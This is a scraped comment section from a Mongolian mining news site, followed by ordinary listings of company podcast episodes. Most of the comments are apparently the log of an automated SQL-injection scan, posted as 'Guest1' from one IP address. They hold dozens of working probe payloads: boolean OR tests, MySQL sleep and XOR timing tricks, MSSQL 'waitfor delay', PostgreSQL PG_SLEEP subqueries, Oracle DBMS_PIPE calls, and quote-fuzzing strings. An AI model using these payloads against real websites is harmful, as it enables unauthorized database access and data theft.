  2023-06-13 01:02 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:03 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:03 | U2ufILSk

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:03 | -1 OR 2+45-45-1=0+0+0+1 --

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:03 | -1 OR 2+694-694-1=0+0+0+1

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:03 | -1' OR 2+262-262-1=0+0+0+1 --

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:03 | -1" OR 2+781-781-1=0+0+0+1 --

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:03 | if(now()=sysdate(),sleep(15),0)

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:04 | 1 waitfor delay '0:0:15' --

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:05 | cJ4zGqyJ'; waitfor delay '0:0:15' --

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:06 | 1'"

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:06 | 1����%2527%2522

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:06 | @@84SA6

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:07 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:07 | 192.168.234.14

  1

 • GuestqrAWnrTS

  LgyxmpHT

  2023-06-13 01:07 | 192.168.234.14

  1

 • Guest1'"

  LgyxmpHT

  2023-06-13 01:13 | 192.168.234.14

  1

 • Guest@@fKlsd

  LgyxmpHT

  2023-06-13 01:13 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:14 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:14 | 192.168.234.14

  1

 • Guest1

  8ac0Qunm

  2023-06-13 01:14 | 192.168.234.14

  1

 • Guest1

  -1 OR 2+550-550-1=0+0+0+1 --

  2023-06-13 01:14 | 192.168.234.14

  1

 • Guest1

  -1 OR 2+671-671-1=0+0+0+1

  2023-06-13 01:14 | 192.168.234.14

  1

 • Guest1

  -1' OR 2+910-910-1=0+0+0+1 --

  2023-06-13 01:14 | 192.168.234.14

  1

 • Guest1

  -1' OR 2+271-271-1=0+0+0+1 or 'cvzSURki'='

  2023-06-13 01:14 | 192.168.234.14

  1

 • Guest1

  -1" OR 2+654-654-1=0+0+0+1 --

  2023-06-13 01:14 | 192.168.234.14

  1

 • Guest1

  if(now()=sysdate(),sleep(15),0)

  2023-06-13 01:15 | 192.168.234.14

  1

 • Guest1

  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  2023-06-13 01:15 | 192.168.234.14

  1

 • Guest1

  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  2023-06-13 01:15 | 192.168.234.14

  1

 • Guest1

  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  2023-06-13 01:16 | 192.168.234.14

  1

 • Guest1

  1 waitfor delay '0:0:15' --

  2023-06-13 01:17 | 192.168.234.14

  1

 • Guest1

  H4qfSeJL'; waitfor delay '0:0:15' --

  2023-06-13 01:17 | 192.168.234.14

  1

 • Guest1

  6VBsePR6' OR 258=(SELECT 258 FROM PG_SLEEP(15))--

  2023-06-13 01:18 | 192.168.234.14

  1

 • Guest1

  tHsxE7Kf') OR 689=(SELECT 689 FROM PG_SLEEP(15))--

  2023-06-13 01:18 | 192.168.234.14

  1

 • Guest1

  jOQuny71')) OR 652=(SELECT 652 FROM PG_SLEEP(15))--

  2023-06-13 01:19 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  2023-06-13 01:19 | 192.168.234.14

  1

 • Guest1

  1'"

  2023-06-13 01:19 | 192.168.234.14

  1

 • Guest1

  1����%2527%2522

  2023-06-13 01:19 | 192.168.234.14

  1

 • Guest1

  @@gqNjx

  2023-06-13 01:19 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:26 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:26 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:27 | 192.168.234.14

  oowdK6Pd

 • Guest1

  LgyxmpHT

  2023-06-13 01:27 | 192.168.234.14

  -1 OR 2+158-158-1=0+0+0+1 --

 • Guest1

  LgyxmpHT

  2023-06-13 01:27 | 192.168.234.14

  -1 OR 2+241-241-1=0+0+0+1

 • Guest1

  LgyxmpHT

  2023-06-13 01:27 | 192.168.234.14

  -1' OR 2+586-586-1=0+0+0+1 --

 • Guest1

  LgyxmpHT

  2023-06-13 01:27 | 192.168.234.14

  -1' OR 2+459-459-1=0+0+0+1 or 'RLBmRtuf'='

 • Guest1

  LgyxmpHT

  2023-06-13 01:27 | 192.168.234.14

  -1" OR 2+563-563-1=0+0+0+1 --

 • Guest1

  LgyxmpHT

  2023-06-13 01:27 | 192.168.234.14

  if(now()=sysdate(),sleep(15),0)

 • Guest1

  LgyxmpHT

  2023-06-13 01:28 | 192.168.234.14

  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

 • Guest1

  LgyxmpHT

  2023-06-13 01:28 | 192.168.234.14

  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

 • Guest1

  LgyxmpHT

  2023-06-13 01:28 | 192.168.234.14

  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

 • Guest1

  LgyxmpHT

  2023-06-13 01:29 | 192.168.234.14

  -1; waitfor delay '0:0:15' --

 • Guest1

  LgyxmpHT

  2023-06-13 01:29 | 192.168.234.14

  -1); waitfor delay '0:0:15' --

 • Guest1

  LgyxmpHT

  2023-06-13 01:29 | 192.168.234.14

  1 waitfor delay '0:0:15' --

 • Guest1

  LgyxmpHT

  2023-06-13 01:29 | 192.168.234.14

  R0kwefHC'; waitfor delay '0:0:15' --

 • Guest1

  LgyxmpHT

  2023-06-13 01:30 | 192.168.234.14

  -5 OR 364=(SELECT 364 FROM PG_SLEEP(15))--

 • Guest1

  LgyxmpHT

  2023-06-13 01:30 | 192.168.234.14

  -5) OR 689=(SELECT 689 FROM PG_SLEEP(15))--

 • Guest1

  LgyxmpHT

  2023-06-13 01:30 | 192.168.234.14

  -1)) OR 107=(SELECT 107 FROM PG_SLEEP(15))--

 • Guest1

  LgyxmpHT

  2023-06-13 01:30 | 192.168.234.14

  OSfhkNWm' OR 94=(SELECT 94 FROM PG_SLEEP(15))--

 • Guest1

  LgyxmpHT

  2023-06-13 01:31 | 192.168.234.14

  2UUX7qLx') OR 428=(SELECT 428 FROM PG_SLEEP(15))--

 • Guest1

  LgyxmpHT

  2023-06-13 01:31 | 192.168.234.14

  CHDHFjdr')) OR 152=(SELECT 152 FROM PG_SLEEP(15))--

 • Guest1

  LgyxmpHT

  2023-06-13 01:31 | 192.168.234.14

  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

 • Guest1

  LgyxmpHT

  2023-06-13 01:31 | 192.168.234.14

  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

 • Guest1

  LgyxmpHT

  2023-06-13 01:31 | 192.168.234.14

  1'"

 • Guest1

  LgyxmpHT

  2023-06-13 01:31 | 192.168.234.14

  1����%2527%2522

 • Guest1

  LgyxmpHT

  2023-06-13 01:31 | 192.168.234.14

  @@hZbRm

 • Guest1

  LgyxmpHT

  2023-06-13 01:32 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:32 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:33 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:33 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:33 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:33 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:33 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:33 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:33 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:33 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:34 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:34 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:34 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:35 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:35 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:35 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:36 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:36 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:36 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:36 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-13 01:36 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-14 06:37 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-15 12:59 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-15 19:17 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-16 15:12 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-16 19:00 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-17 04:12 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-17 19:18 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-18 14:20 | 192.168.234.14

  1

 • Guest1

  LgyxmpHT

  2023-06-18 19:44 | 192.168.234.14

  1

Сэтгэгдэл үлдээх

wave
зочин1
зочин2
зочин3
зочин4
зочин5
зочин6
зочин7
зочин8

Уншигчдын бичсэн сэтгэгдэлд ErdenetToday.mn хариуцлага хүлээхгүй болно. Та сэтгэгдэл бичихдээ хууль зүйн болон ёс суртахууны хэм хэмжээг хүндэтгэнэ үү. Хэм хэмжээг зөрчсөн сэтгэгдэлийг админ устгах эрхтэй.

УУРХАЙЧИН ПОДКАСТ №37 - Л.БАТГЭРЭЛ

Уурхайчин подкаст #37 "Эрдэнэт үйлдвэр" ТӨҮГ-ын ХАБЭА-н хэлтсийн сайжруулалтын мэргэжилтэн Л.БАТГЭРЭЛ: -Хүний амь нас, эрүүл мэндийг хамгаалах тухайд хөгжлийн гол гарц, сайжруулалтын цөм бол харилцан уялдаатай ажиллах байдал юм

 • 22/09/2022
 • 1799
 • 625
УУРХАЙЧИН ПОДКАСТ №36 - Г.ЭРДЭНЭТУЯА

“Уурхайчин подкаст” #36 Эх дэлхийн өдөрт зориулав Байгаль орчин, ногоон хөгжлийн хэлтсийн Байгаль орчин нөхөн сэргээх мэргэжилтэн Г.ЭРДЭНЭТУЯА: -Эрдэнэт үйлдвэр нь хоосон чулуулаг дээр нөхөн сэргээлт хийсэн анхны уурхай юм

 • 22/09/2022
 • 1671
 • 301
УУРХАЙЧИН ПОДКАСТ №35 - Ж.ГАНЧИМЭГ

Дэлхийн эрүүл мэндийн өдөрт зориулав Эрдэнэт сувиллын цогцолборын үйл ажиллагаа хариуцсан орлогч-Ерөнхий эмч Ж.ГАНЧИМЭГ: -Үйлдвэрийн ажилчдын 5 жилийн эрүүл мэндийн үзлэгт дүгнэлт хийхэд ажилтнуудын эрүүл мэндийн байдал сайжирч, зөв дадал хэвшилд суралцаж эерэг үзүүлэлт гарч байгаад эмч мэргэжилтнүүд баяртай байна

 • 22/09/2022
 • 1368
 • 10
УУРХАЙЧИН ПОДКАСТ №34 - Б.БЯМБААСҮРЭН

Амжилттай ажиллахын үндэс нь аз жаргалтай гэр бүл. Тийм учраас хүний нөөцийн мэргэжилтнүүд үүнд үйл ажиллагаагаа чиглүүлдэг

 • 28/05/2021
 • 3981
 • 0
УУРХАЙЧИН ПОДКАСТ №33 - Ц.БАТАА

Ц.БАТАА - Сэтгэцийн эмгэг, донтолт судлалын ахлах зэргийн эмч, клиникийн профессор

 • 12/04/2021
 • 5329
 • 0
УУРХАЙЧИН ПОДКАСТ №32 - Г.ТАМИР

Уурхайчдын баярын өдөрт зориулсан тусгай дугаар "Эрдэнэт үйлдвэр" ТӨҮГ-ын Улаанбаатар дахь төлөөлөгчийн газрын орлогч дарга Г.Тамир: Эрдэнэт үйлдвэр бол төрийн өмчит үйлдвэрийн газар хэрхэн амжилттай ажилладаг жишгийг бүс нутгийн хэмжээнд харуулж байна

 • 11/01/2021
 • 4303
 • 0
УУРХАЙЧИН ПОДКАСТ №31 - М.МАЙЦЭЦЭГ

“Эрдэнэт үйлдвэр” ТӨҮГ-ын “Энэрэл” төвийн эрхлэгч М.Майцэцэг Амьдралын олон өнгө, өөр бусад шалтгаанаар аав ээжээсээ холдсон олон арван алаг үрсийг эцэг эхийн хайраар дутаалгүй өсгөж хүмүүжүүлж, амьдралын их замд хөл тавих хүндтэй үүргийг Эрдэнэт үйлдвэрийн “Энэрэл” төвийн хамт олон хариуцдаг

 • 11/01/2021
 • 3833
 • 0
УУРХАЙЧИН ПОДКАСТ №30 - Б.БЯМБАДАГВА

"Эрдэнэт үйлдвэр" ТӨҮГ-ын Хөрөнгө оруулалт, худалдан авах ажиллагааны бодлогын газрын дарга Б.Бямбадагва: -Барилгын салбар газрын гадаргуу дээр барилга барьдаг бол уул уурхайн салбар газрын доор барилга барьдаг

 • 11/01/2021
 • 4231
 • 0
УУРХАЙЧИН ПОДКАСТ №29 - П.ТҮВШИНЖАРГАЛ

"Эрдэнэт үйлдвэр" ТӨҮГ-ын Үйлдвэрлэлийн бодлогын газрын Ерөнхий уурхайчин П.Түвшинжаргал: Бидний үеийн залуус онцгой, сонин эрин үед ажиллаж байна

 • 11/01/2021
 • 4149
 • 0
УУРХАЙЧИН ПОДКАСТ №28 - Д.НЯМДОРЖ

"Эрдэнэт үйлдвэр" ТӨҮГ-ын Үйлдвэрлэлийн хэлтсийн орлогч дарга, Техникийн ухааны доктор, ШУТИС-ийн хүндэт доктор Д.Нямдорж: -Уул уурхайн салбар их эрсдэлтэй

 • 11/01/2021
 • 3914
 • 0